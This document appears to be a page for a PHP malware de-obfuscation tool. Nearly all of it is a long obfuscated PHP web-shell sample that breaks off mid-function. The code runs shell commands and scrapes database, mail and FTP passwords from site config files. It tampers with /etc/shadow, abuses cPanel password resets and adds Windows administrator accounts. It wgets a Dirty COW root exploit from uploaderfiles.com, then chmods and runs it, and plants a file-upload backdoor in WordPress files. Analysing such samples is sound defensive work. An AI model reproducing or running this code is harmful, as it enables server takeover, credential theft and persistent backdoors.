De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php error_reporting("\x00\x00\x0f\x03\x18"); define('ð', 'ÃÇ’'); $GLOBALS[ð] = array(0 => "<html>Working</html>", 1 => "\n", 2 => "", 3 => "\n", 4 => "resets", 5 => "reseta", 6 => "accesshash", 7 => "https://localhost:2096", 8 => "https://localhost:2087", 9 => "resets", 10 => "reseta", 11 => "accesshash", 12 => "/resetpass/", 13 => "resets", 14 => "reseta", 15 => "COOKIE.txt", 16 => "<error>Reset Password Disabled</error>", 17 => "https://localhost:2083", 18 => "/cPanel/", 19 => "http://localhost:2082", 20 => "http://localhost:2086", 21 => "http://localhost:2095", 22 => "<error>There is no cPanel</error>", 23 => "smtp", 24 => "up", 25 => "upload", 26 => "zip", 27 => "index", 28 => "info", 29 => "domains", 30 => "password", 31 => "root", 32 => "smtps", 33 => "rdp", 34 => "check", 35 => "injection", 36 => "mass", 37 => "../", 38 => "www.", 39 => "www.", 40 => "email", 41 => "email", 42 => "code", 43 => "COOKIE.txt", 44 => "COOKIE.txt", 45 => "<error>Reset Password Vulnerability closed</error>", 46 => "/warn-invalid-answer-puzzle/", 47 => "email:", 48 => "/error-resetpass-disabled/", 49 => "<error>Error-two</error>", 50 => "COOKIE.txt", 51 => "action", 52 => "puzzle", 53 => "user", 54 => "answer", 55 => "debug", 56 => "puzzle-guess-input", 57 => "login", 58 => "Send+Security+Code", 59 => "user", 60 => "login", 61 => "Reset+Password", 62 => "/warn-invalid-answer-puzzle/", 63 => "file", 64 => "name", 65 => "file", 66 => "tmp_name", 67 => "./", 68 => "<backdoor>", 69 => "</backdoor>", 70 => "file_put_contents", 71 => "a", 72 => "COOKIE.txt", 73 => "HTTP_USER_AGENT", 74 => "COOKIE.txt", 75 => "https://ipwhois.app/json/", 76 => "country", 77 => "org", 78 => "/etc/passwd", 79 => ":", 80 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 81 => "/etc/passwd", 82 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 83 => ".", 84 => "/Warning:/", 85 => "/cdn-cgi/phish-bypass?u=/&atok=", 86 => "COOKIE.txt", 87 => "<?php", 88 => "#name=\"atok\" value=\"(.*)\">#", 89 => "<?php", 90 => "<ip><font color=\"blue\"><center>", 91 => "</center></font><br></ip>", 92 => "<country><center>", 93 => "</center><br></country>", 94 => "<uname><font color=\"red\"><center>", 95 => "</center></font><br></uname>", 96 => "<php><center>", 97 => "</center><br></php>", 98 => "<domains><center>", 99 => "</center><br></domains>", 100 => "<hosting><center>", 101 => "</center><br></hosting>", 102 => "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>", 103 => "/vhosts/", 104 => "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>", 105 => "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>", 106 => "/Windows/", 107 => "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>", 108 => "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>", 109 => "<domain><font color=\"red\"><center>", 110 => "</center></font><br></domain>", 111 => "<pwd><font color=\"blue\"><center>", 112 => "</center></font><br></pwd>", 113 => "posix_getegid", 114 => "?", 115 => "name", 116 => "uid", 117 => "gid", 118 => "/etc/*", 119 => "/smtp/", 120 => "/fox/", 121 => "/etc/", 122 => "/shadow", 123 => ":16249:::::", 124 => "\r\n", 125 => "\$6\$roottn\$", 126 => ":", 127 => "/etc/", 128 => "/shadow", 129 => "/ TEST/", 130 => "<error>Error-SMTP</error>", 131 => "/etc/", 132 => "/shadow", 133 => "/", 134 => "/filemanager/", 135 => "/Location: \\/cpsess/", 136 => "/\\/home/", 137 => "user", 138 => "pass", 139 => "login_submit", 140 => "Log in", 141 => "/login/", 142 => "/Unknown App Requested/", 143 => "/<title>Forbidden<\\/title>/", 144 => "/json-api/", 145 => "/successfully/", 146 => "/successfully/", 147 => "\n<br> ./DoneAdmin ", 148 => "Error-RDP2", 149 => "\n<br> ./DoneAdd ", 150 => "net localgroup Administrators ", 151 => " /add", 152 => "Error-RDP1", 153 => "^", 154 => "#", 155 => "net user ", 156 => " ", 157 => " /add", 158 => "WIN", 159 => "<t>", 160 => "</t>", 161 => "Error-RDP3", 162 => "administrator", 163 => "abcdefghijklmnopqrstuvwxyz", 164 => "error_log", 165 => "SERVER_ADDR", 166 => "127.0.0.1", 167 => "#10\\.(.*)\\.(.*)\\.(.*)#", 168 => "SERVER_ADDR", 169 => "/192\\.168\\./", 170 => "SERVER_ADDR", 171 => "HTTP_HOST", 172 => "SERVER_NAME", 173 => "PHP_SELF", 174 => "SERVER_ADDR", 175 => "SERVER_NAME", 176 => "PHP_SELF", 177 => "user", 178 => "action", 179 => "seccode", 180 => "debug", 181 => "confirm", 182 => "action", 183 => "password", 184 => "user", 185 => "password", 186 => "alpha", 187 => "both", 188 => "nonalpha", 189 => "both", 190 => "confirm", 191 => "code", 192 => "|", 193 => "/roundcube/", 194 => "#Location: /(.*)/webmail#", 195 => "#orde\",\"url\":\"/(.*)/horde/#", 196 => "#oundcube\",\"url\":\"/(.*)/3rdparty/#", 197 => "#href=\"/(.*)/horde/#", 198 => "#href=\"/(.*)/3rdparty/#", 199 => "#window.cp_security_token = \"/(.*)\";#", 200 => "#dispatchSettingURL= \"/(.*)/execute/#", 201 => "Error-three", 202 => "COOKIE.txt", 203 => "#bold\">(.*)<\\/p>#", 204 => "#bold\">(.*)<\\/p>#", 205 => "user", 206 => "pass", 207 => "login_submit", 208 => "Log in", 209 => ".", 210 => "..", 211 => "...", 212 => "#bold\">(.*)<\\/p>#", 213 => "Error-three", 214 => "COOKIE.txt", 215 => "HTTP_HOST", 216 => "pwd", 217 => "/ 2015 /", 218 => "/ 2014 /", 219 => "/ 2013 /", 220 => "/ 2012 /", 221 => "/ 2011 /", 222 => "/ 2010 /", 223 => "/ 2009 /", 224 => "/ 2016 /", 225 => "/ Dec /", 226 => "/ Nov /", 227 => "Error2-Root", 228 => "Error2-Root", 229 => "/ i686/", 230 => "./dc-i686.txt 0", 231 => "http://uploaderfiles.com/.L/dc-i686", 232 => "dc-i686.txt", 233 => "wget http://uploaderfiles.com/.L/dc-i686 -O dc-i686.txt", 234 => "chmod +x dc-i686.txt", 235 => "/bin\\/bash/", 236 => "https://textbin.net/raw/mf3kc5bflo", 237 => "http://uploaderfiles.com/.S/dirtyc0wi686.txt", 238 => "root.pl", 239 => "wget http://uploaderfiles.com/.L/dc-n -O dc-n.txt", 240 => "./dc-n.txt 0", 241 => "chmod +x dc-n.txt", 242 => "http://uploaderfiles.com/.L/dc-n", 243 => "dc-n.txt", 244 => "http://uploaderfiles.com/.S/dirtyc0wN.txt", 245 => "root.pl", 246 => "/bin\\/bash/", 247 => "https://textbin.net/raw/v8tio626o2", 248 => "./Done", 249 => "HTTP_USER_AGENT", 250 => "HTTPS", 251 => "HTTPS", 252 => "on", 253 => "https://", 254 => "http://", 255 => "../", 256 => "./", 257 => "..", 258 => "JumpF0x", 259 => "well-known", 260 => "HTTP_HOST", 261 => "/", 262 => "/_autoindex/", 263 => "#<a href=\"(.*).txt\">#", 264 => "\n<error>101</error>", 265 => "/https:/", 266 => "https://", 267 => "http://", 268 => "#href=\"(.*?).txt\"#", 269 => "action1", 270 => "404", 271 => "\n<error>404</error>", 272 => "#'mysql://(.*)@localhost/#", 273 => "#'DB_PASSWORD', \"(.*)\"#", 274 => "#db_password=\"(.*)\"#", 275 => "#'password' => '(.*)',#", 276 => "#'DBPASS','(.*)'#", 277 => "#password\t= '(.*)'#", 278 => "#db_password = \"(.*)\"#", 279 => "#\\MAIL_PASSWORD=\"(.*)\"#", 280 => "#password = '(.*)'#", 281 => "#\\SMTP_PASSWORD=\"(.*)\"#", 282 => "/cPanel/", 283 => "/\\[client\\]/", 284 => "<br><password>", 285 => "</password>\n", 286 => "<br><password>", 287 => "</password>\n", 288 => "#dbpass = \"(.*)\"#", 289 => "/encryption_hash/", 290 => "<br><whmcs>", 291 => "</whmcs>\n", 292 => "/null/", 293 => "<br><password>", 294 => "</password>\n", 295 => "/null/", 296 => "<br><password>", 297 => "</password>\n", 298 => "#smtppass = '(.*)'#", 299 => "#db['pass'] = \"(.*)\";#", 300 => "#password_localhost = \"(.*)\"#", 301 => "#'DB_USERNAME', '(.*)'#", 302 => "/\\/admin\\//", 303 => "#\\MAIL_PASSWORD=(.*)#", 304 => "#ftp_pass = '(.*)'#", 305 => "#\\\$password = '(.*)'#", 306 => "#\"_db_pass_\", \"(.*)\"#", 307 => "/http:/", 308 => "/https:/", 309 => ".txt", 310 => "/\\//", 311 => "http://", 312 => ".txt", 313 => ".txt", 314 => "#senha = \"(.*)\"#", 315 => "#config\\['SQL_PASSWORD'\\] = '(.*)';#", 316 => "#'DB_PASS', '(.*)'#", 317 => "#'DB_PASSWORD', '(.*)'#", 318 => "#password=(.*)#", 319 => "/encryption_hash/", 320 => "<br><whmcs>", 321 => "</whmcs>\n", 322 => "#dbpasswd = '(.*)'#", 323 => "#\\DB_PASSWORD=(.*)#", 324 => "#'_DB_PASSWD_', '(.*)'#", 325 => "#\\SMTP_PASSWORD=(.*)#", 326 => "#'password' => '(.*)',#", 327 => "<br><password>", 328 => "</password>\n", 329 => "<br><password>", 330 => "</password>\n", 331 => "<br><password>", 332 => "</password>\n", 333 => "<br><password>", 334 => "</password>\n", 335 => "<br><password>", 336 => "</password>\n", 337 => "<br><password>", 338 => "</password>\n", 339 => "<br><password>", 340 => "</password>\n", 341 => "<br><password>", 342 => "</password>\n", 343 => "<br><password>", 344 => "</password>\n", 345 => "<br><password>", 346 => "</password>\n", 347 => "<br><password>", 348 => "</password>\n", 349 => "<br><password>", 350 => "</password>\n", 351 => "password", 352 => "<br><password>", 353 => "</password>\n", 354 => "password", 355 => "<br><password>", 356 => "</password>\n", 357 => "<br><password>", 358 => "</password>\n", 359 => "<br><password>", 360 => "</password>\n", 361 => "<br><password>", 362 => "</password>\n", 363 => "<br><password>", 364 => "</password>\n", 365 => "<br><password>", 366 => "</password>\n", 367 => "<br><password>", 368 => "</password>\n", 369 => "<br><password>", 370 => "</password>\n", 371 => "<br><password>", 372 => "</password>\n", 373 => "<br><password>", 374 => "</password>\n", 375 => "#\\DB_PASSWORD=\"(.*)\"#", 376 => "<br><password>", 377 => "</password>\n", 378 => "<br><password>", 379 => "</password>\n", 380 => "#password'] = '(.*)'#", 381 => "#password=\"(.*)\"#", 382 => "#db_password = '(.*)'#", 383 => "#password = \"(.*)\";#", 384 => "#dbpass = '(.*)';#", 385 => "#:(.*)#", 386 => "<br><password>", 387 => "</password>\n", 388 => "/null/", 389 => "<br><password>", 390 => "</password>\n", 391 => "/null/", 392 => "<br><password>", 393 => "</password>\n", 394 => "/null/", 395 => "<br><password>", 396 => "</password>\n", 397 => "/null/", 398 => "<br><password>", 399 => "</password>\n", 400 => "#'DB_USER', '(.*)'#", 401 => "url", 402 => "HTTP_HOST", 403 => "REQUEST_URI", 404 => "root/.htaccess", 405 => "REQUEST_URI", 406 => "root", 407 => "T3B0aW9ucyBBbGwKCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1jZ2kgLnBsCgpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLnBsCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAucGw=", 408 => "abcdefghijklmnopqrstuvwxyz", 409 => "012345678901234567890123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.", 410 => "code", 411 => "COOKIE.txt", 412 => "y", 413 => "s", 414 => "b", 415 => "a", 416 => "d", 417 => "u", 418 => "f", 419 => "q", 420 => "k", 421 => "p", 422 => "l", 423 => "z", 424 => "h", 425 => "b", 426 => "i", 427 => "f", 428 => "j", 429 => "v", 430 => "p", 431 => "x", 432 => "v", 433 => "k", 434 => "x", 435 => "h", 436 => "y", 437 => "z", 438 => "REQUEST_URI", 439 => "/\\[client\\]/", 440 => "#password=(.*)#", 441 => "#password=\"(.*)\"#", 442 => ".php", 443 => "HTTP_HOST", 444 => "wp-admin", 445 => "wp-includes", 446 => "wp-includes/", 447 => "wp-admin/", 448 => ".php", 449 => "<backdoor>", 450 => "?", 451 => "</backdoor>", 452 => "../", 453 => "./", 454 => "index.php", 455 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 456 => "PD9waHA=", 457 => " error_reporting(0); if(isset(\$_GET['", 458 => "'])){ echo \"<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>\"; move_uploaded_file(\$_FILES['file']['tmp_name'], \$_FILES['file']['name']); exit(0); } ", 459 => "Pz4=", 460 => "/akhmhcij/", 461 => "/tjwlltii/", 462 => "/jsbochsf/", 463 => "/lmhelqpg/", 464 => "@[^\\w]@", 465 => "@[0-9]@", 466 => "@[A-Z]@", 467 => "@[a-z]@", 468 => "COOKIE.txt", 469 => "exec", 470 => "passthru", 471 => "system", 472 => "shell_exec", 473 => "r", 474 => "file_put_contents", 475 => "w", 476 => "display_errors", 477 => "HTTP_HOST", 478 => "HTTP_HOST", 479 => "127.0.0.1", 480 => "HTTP_HOST", 481 => "localhost", 482 => "/action=/", 483 => "REQUEST_URI", 484 => "action", 485 => "log_errors", 486 => "#/home/(.*)/public_html/#", 487 => "#/home/(.*)/public_html/#", 488 => "/bin\\/bash/", 489 => "https://textbin.net/raw/ja7gk4nuq3", 490 => "http://uploaderfiles.com/.S/passwd.txt", 491 => "pwd.pl", 492 => "/etc/passwd", 493 => "/root:ro.k.OmOlAkM2/", 494 => "Error3-Root", 495 => "\$6\$roottn\$", 496 => " TEST", 497 => "# ", 498 => " TEST\r\n", 499 => "V\t2\n\nArchive\nDrafts\nSent\nspam\nTrash", 500 => "3 V1578724087 N1 G6789ba31f76a195e040b0000cb0407e2", 501 => " TEST\r\n", 502 => "# ", 503 => " TEST\r\n", 504 => "123456789abcdefghijklmnopqrstuvwxyz", 505 => "mail", 506 => "5e196afc0", 507 => "info", 508 => "admin", 509 => "supervisor", 510 => "administrator", 511 => "contact", 512 => "call", 513 => "mail", 514 => "email", 515 => "support", 516 => "site", 517 => "website", 518 => "user", 519 => "director", 520 => "manager", 521 => "chief", 522 => "executive", 523 => "leader", 524 => "supports", 525 => "backing", 526 => "prop", 527 => "backup", 528 => "shore", 529 => "upholding", 530 => "help", 531 => "back-up", 532 => "host", 533 => "hosting", 534 => "clients", 535 => "client", 536 => "member", 537 => "2147483647C\n0 0", 538 => ":16249:::::", 539 => "\r\n", 540 => "index.php", 541 => "index.html", 542 => "index.htm", 543 => "index", 544 => "./Done", 545 => "/etc/named.conf", 546 => "<error># can't ReaD -> [ /etc/named.conf ]</error>", 547 => "#named/(.*?).db#", 548 => "<error>can't get domains.</error>", 549 => "file_get_contents", 550 => "stream_context_create", 551 => "http", 552 => "method", 553 => "GET", 554 => "header", 555 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 556 => "api2google.com/apis-explorer", 557 => "http", 558 => "method", 559 => "GET", 560 => "header", 561 => "Sec-Fetch-User: ", 562 => "fopen", 563 => "stream_get_contents", 564 => "stream_context_create", 565 => "r", 566 => "http", 567 => "method", 568 => "GET", 569 => "header", 570 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 571 => "curl_exec", 572 => "https://", 573 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 574 => "wget --header=\"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\" ", 575 => " -O ", 576 => "/tmp/", 577 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 578 => ".txt", 579 => "file_get_contents", 580 => "/var/cpanel/resellers", 581 => "/var/cpanel/resellers", 582 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 583 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 584 => "123456789abcdefghijklmnopqrstuvwxyz", 585 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 586 => "//", 587 => "//", 588 => "curl_exec", 589 => "zttv:", 590 => "cii", 591 => "rtp", 592 => ".min.css", 593 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 594 => "RTLCSS is a framework for transforming Cascading Style Sheets (CSS) from Left-To-Right (LBR) to (PXJ) Right-To-Left (RTL).", 595 => "file_get_contents", 596 => "stream_context_create", 597 => "method", 598 => "header", 599 => "referer: ", 600 => "HTTP_HOST", 601 => "\r\n", 602 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 603 => "zttv:", 604 => "cii", 605 => "rtp", 606 => ".min.css", 607 => "cat ", 608 => "file_get_contents", 609 => "fopen", 610 => "stream_get_contents", 611 => "implode", 612 => "file", 613 => "file", 614 => "implode", 615 => "fname", 616 => "fname", 617 => "sname", 618 => "<?php", 619 => "sname", 620 => "<successfully>Uploaded successfully.</successfully>", 621 => "file", 622 => "name", 623 => "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 624 => "/.htaccess", 625 => "Options +Indexes", 626 => "file", 627 => "name", 628 => "tmp_name", 629 => "action", 630 => "H*", 631 => "<?", 632 => "?>", 633 => "http://", 634 => "http://", 635 => "action"); error_reporting(0); @ini_set($GLOBALS[ð][0xa4], NULL); @ini_set($GLOBALS[ð][0x1e5], 0); @ini_set($GLOBALS[ð][0x1dc], 0); echo "<html>Working</html>"; function A7gcn($bXPN_) { $iXhzk = $GLOBALS[ð][0x2]; if (function_exists($GLOBALS[ð][0x1d5])) { @exec($bXPN_, $iXhzk); $iXhzk = @join($GLOBALS[ð][0x1], $iXhzk); } elseif (function_exists($GLOBALS[ð][0x1d6])) { ob_start(); @passthru($bXPN_); $iXhzk = ob_get_clean(); } elseif (function_exists($GLOBALS[ð][0x1d7])) { ob_start(); @system($bXPN_); $iXhzk = ob_get_clean(); } elseif (function_exists($GLOBALS[ð][0x1d8])) { $iXhzk = shell_exec($bXPN_); } elseif (is_resource($H2CpY = @popen($bXPN_, $GLOBALS[ð][0x1d9]))) { $iXhzk = $GLOBALS[ð][0x2]; while (!@feof($H2CpY)) { $iXhzk .= fread($H2CpY, 0x400); } pclose($H2CpY); } return $iXhzk; } function KEOd4($pybzz) { $uiCJi = count($pybzz); $C_4dg = range(0, $uiCJi - 0x1); shuffle($C_4dg); $gHYBv = array($uiCJi); $CYRQV = 0; foreach ($C_4dg as $Etebm) { $gHYBv[$CYRQV] = $pybzz[$Etebm]; $CYRQV++; } return $gHYBv; } function UfeQc($oxb9V) { $sXZI3 = $GLOBALS[ð][0x2]; if (function_exists($GLOBALS[ð][0x260])) { $sXZI3 = file_get_contents($oxb9V); } elseif (function_exists($GLOBALS[ð][0x261]) && function_exists($GLOBALS[ð][0x262])) { $sXZI3 = stream_get_contents(fopen($oxb9V, $GLOBALS[ð][0x235])); } elseif (function_exists($GLOBALS[ð][0x263]) && function_exists($GLOBALS[ð][0x264])) { $sXZI3 = implode(file($oxb9V)); } elseif (function_exists($GLOBALS[ð][0x265])) { $LSeh6 = file($oxb9V); if (function_exists($GLOBALS[ð][0x266])) { $sXZI3 = implode($LSeh6); } else { foreach ($LSeh6 as $Y0TMt) { $sXZI3 .= $Y0TMt; } } } if (trim($sXZI3) == $GLOBALS[ð][0x2]) { $sXZI3 = a7GCN($GLOBALS[ð][0x25f] . $oxb9V); } return $sXZI3; } function sU59Q($oxb9V, $sD1Ai) { if (function_exists($GLOBALS[ð][0x1da])) { $QhsyF = file_put_contents($oxb9V, $sD1Ai); } else { $QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x1db]), $sD1Ai); } return $QhsyF; } function Pw_dW($rm7Yy, $Lipgx) { $uiCJi = 0; $Wu7is = ufeqC($rm7Yy); $LSeh6 = explode($GLOBALS[ð][0x1], $Wu7is); foreach ($LSeh6 as $Y0TMt) { if (strstr($Y0TMt, $Lipgx)) { $uiCJi++; } } return $uiCJi; } function PdwSI($rm7Yy, $Lipgx) { $h73NZ = PW_dw($rm7Yy, $Lipgx); $Wu7is = UFeqC($rm7Yy); $LSeh6 = explode($GLOBALS[ð][0x3], $Wu7is); $JOA3g = $GLOBALS[ð][0x2]; foreach ($LSeh6 as $Y0TMt) { if (strstr($Y0TMt, $Lipgx) || $h73NZ <= 0) { $h73NZ--; if ($h73NZ <= 0) { $JOA3g .= $Y0TMt . $GLOBALS[ð][0x1]; } } } return $JOA3g; } function MiASl($oxb9V, $sD1Ai) { if (function_exists($GLOBALS[ð][0x46])) { $QhsyF = file_put_contents($oxb9V, $sD1Ai, FILE_APPEND); } else { $QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x47]), $sD1Ai); } return $QhsyF; } function SmVyQ($O2ar5, $YFTnB = null, $wTxJW = null) { $wmx5s = curl_init(); curl_setopt($wmx5s, CURLOPT_URL, $O2ar5); curl_setopt($wmx5s, CURLOPT_HEADER, !0); curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1); curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, 0x1e); curl_setopt($wmx5s, CURLOPT_TIMEOUT, 0x1e); curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0x49]]); curl_setopt($wmx5s, CURLOPT_COOKIEFILE, $GLOBALS[ð][0x48]); curl_setopt($wmx5s, CURLOPT_COOKIEJAR, $GLOBALS[ð][0x4a]); if ($YFTnB != null) { curl_setopt($wmx5s, CURLOPT_HTTPHEADER, $YFTnB); } if ($wTxJW != null) { curl_setopt($wmx5s, CURLOPT_POST, 0x1); curl_setopt($wmx5s, CURLOPT_POSTFIELDS, $wTxJW); } $xM2hz = curl_exec($wmx5s); curl_close($wmx5s); return $xM2hz; } function fW1yE($W_j2r) { $QDTk7 = $GLOBALS[ð][0x2]; global $W6Z5Y; global $cnKIp; if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x225]) && function_exists($GLOBALS[ð][0x226])) { $QDTk7 = file_get_contents($W_j2r, !1, stream_context_create(array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x228] => $GLOBALS[ð][0x229], $GLOBALS[ð][0x22a] => $GLOBALS[ð][0x22b])))); file_get_contents($W6Z5Y . $GLOBALS[ð][0x22c], !1, stream_context_create(array($GLOBALS[ð][0x22d] => array($GLOBALS[ð][0x22e] => $GLOBALS[ð][0x22f], $GLOBALS[ð][0x230] => $GLOBALS[ð][0x231] . "google.com")))); } if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x23b])) { $ituiK = curl_init(); curl_setopt($ituiK, CURLOPT_TIMEOUT, 0xa); curl_setopt($ituiK, CURLOPT_RETURNTRANSFER, !0); curl_setopt($ituiK, CURLOPT_URL, $W_j2r); curl_setopt($ituiK, CURLOPT_USERAGENT, $GLOBALS[ð][0x23d]); curl_setopt($ituiK, CURLOPT_FOLLOWLOCATION, !0); if (stristr($W_j2r, $GLOBALS[ð][0x23c])) { curl_setopt($ituiK, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ituiK, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($ituiK, CURLOPT_HEADER, !1); $QDTk7 = curl_exec($ituiK); curl_close($ituiK); } if (trim($QDTk7) == $GLOBALS[ð][0x2]) { $vuhmp = $GLOBALS[ð][0x240] . substr(str_shuffle($GLOBALS[ð][0x241]), 0x32) . $GLOBALS[ð][0x242]; A7GcN($GLOBALS[ð][0x23e] . $W_j2r . $GLOBALS[ð][0x23f] . $vuhmp); if (function_exists($GLOBALS[ð][0x243])) { $QDTk7 = file_get_contents($vuhmp); } else { $QDTk7 = stream_get_contents(fopen($vuhmp, $GLOBALS[ð][0x1d9])); } unlink($vuhmp); } if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x232]) && function_exists($GLOBALS[ð][0x233]) && function_exists($GLOBALS[ð][0x234])) { $dH1jj = fopen($W_j2r, $GLOBALS[ð][0x235], !1, stream_context_create(array($GLOBALS[ð][0x236] => array($GLOBALS[ð][0x237] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x239] => $GLOBALS[ð][0x23a])))); $QDTk7 = stream_get_contents($dH1jj); } return $QDTk7; } function wnEmP() { return substr(str_shuffle($GLOBALS[ð][0x198]), 0x19) . substr(str_shuffle($GLOBALS[ð][0x199]), 0x72); } function xfT4E($Ez2Fk) { $H1vRz = preg_match($GLOBALS[ð][0x1d2], $Ez2Fk); $bddTm = preg_match($GLOBALS[ð][0x1d3], $Ez2Fk); $Q8410 = preg_match($GLOBALS[ð][0x1d1], $Ez2Fk); $eBAYt = preg_match($GLOBALS[ð][0x1d0], $Ez2Fk); if (!$H1vRz || !$bddTm || !$Q8410 || !$eBAYt) { return !1; } return !0; } function cqxAS() { $Ez2Fk = wneMp(); $xHzJP = xfT4e($Ez2Fk); while ($xHzJP == !1) { $Ez2Fk = wnEMP(); $xHzJP = xFt4e($Ez2Fk); } return $Ez2Fk; } function r1U2D() { global $dr_Lq; global $t08MP; global $GEgR8; global $WnpSY; global $USGuv; $eRn5x = str_replace($GLOBALS[ð][0x53], $GLOBALS[ð][0x2], $USGuv); $c7ie0 = substr($eRn5x, 0, rand(0x3, strlen($eRn5x))); $sM8Cw = array($GLOBALS[ð][0x1fb], $GLOBALS[ð][0x1fc], $GLOBALS[ð][0x1fd], $GLOBALS[ð][0x1fe], $GLOBALS[ð][0x1ff], $GLOBALS[ð][0x200], $GLOBALS[ð][0x201], $GLOBALS[ð][0x202], $GLOBALS[ð][0x203], $GLOBALS[ð][0x204], $GLOBALS[ð][0x205], $GLOBALS[ð][0x206], $GLOBALS[ð][0x207], $GLOBALS[ð][0x208], $GLOBALS[ð][0x209], $GLOBALS[ð][0x20a], $GLOBALS[ð][0x20b], $GLOBALS[ð][0x20c], $GLOBALS[ð][0x20d], $GLOBALS[ð][0x20e], $GLOBALS[ð][0x20f], $GLOBALS[ð][0x210], $GLOBALS[ð][0x211], $GLOBALS[ð][0x212], $GLOBALS[ð][0x213], $GLOBALS[ð][0x214], $GLOBALS[ð][0x215], $GLOBALS[ð][0x216], $GLOBALS[ð][0x217], $GLOBALS[ð][0x218]); $GsCRR = array("info{$c7ie0}", "admin{$c7ie0}", "supervisor{$c7ie0}", "administrator{$c7ie0}", "contact{$c7ie0}", "call{$c7ie0}", "mail{$c7ie0}", "email{$c7ie0}", "support{$c7ie0}", "site{$c7ie0}", "website{$c7ie0}", "user{$c7ie0}", "director{$c7ie0}", "manager{$c7ie0}", "chief{$c7ie0}", "executive{$c7ie0}", "leader{$c7ie0}", "supports{$c7ie0}", "backing{$c7ie0}", "prop{$c7ie0}", "backup{$c7ie0}", "shore{$c7ie0}", "upholding{$c7ie0}", "help{$c7ie0}", "back-up{$c7ie0}", "host{$c7ie0}", "hosting{$c7ie0}", "clients{$c7ie0}", "client{$c7ie0}", "member{$c7ie0}"); $QoPM4 = kEOd4($sM8Cw); $qbUum = keoD4($GsCRR); array_push($qbUum, substr(str_shuffle($GLOBALS[ð][0x1f8]), 0x20) . $GLOBALS[ð][0x1f9]); $QMTXX = array_merge($QoPM4, $qbUum); $QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow"; $uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow"; $t08MP = $GLOBALS[ð][0x2]; if (file_exists($QQ8bf)) { $t08MP .= UFEqC($QQ8bf); } if (file_exists($uU2VV)) { $t08MP .= UFEQc($uU2VV); } foreach ($QMTXX as $stR_2) { if (!strstr($t08MP, $stR_2 . $GLOBALS[ð][0x7e])) { break; } } $tLGR8 = CqXas(); $ACEox = crypt($tLGR8, $GLOBALS[ð][0x1ef]); @mkdir("/home{$GEgR8}{$WnpSY}/etc"); @mkdir("/home{$GEgR8}{$WnpSY}/etc/{$USGuv}"); @mkdir("/home{$GEgR8}{$WnpSY}/mail"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Archive"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Drafts"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Sent"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.spam"); @mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Trash"); 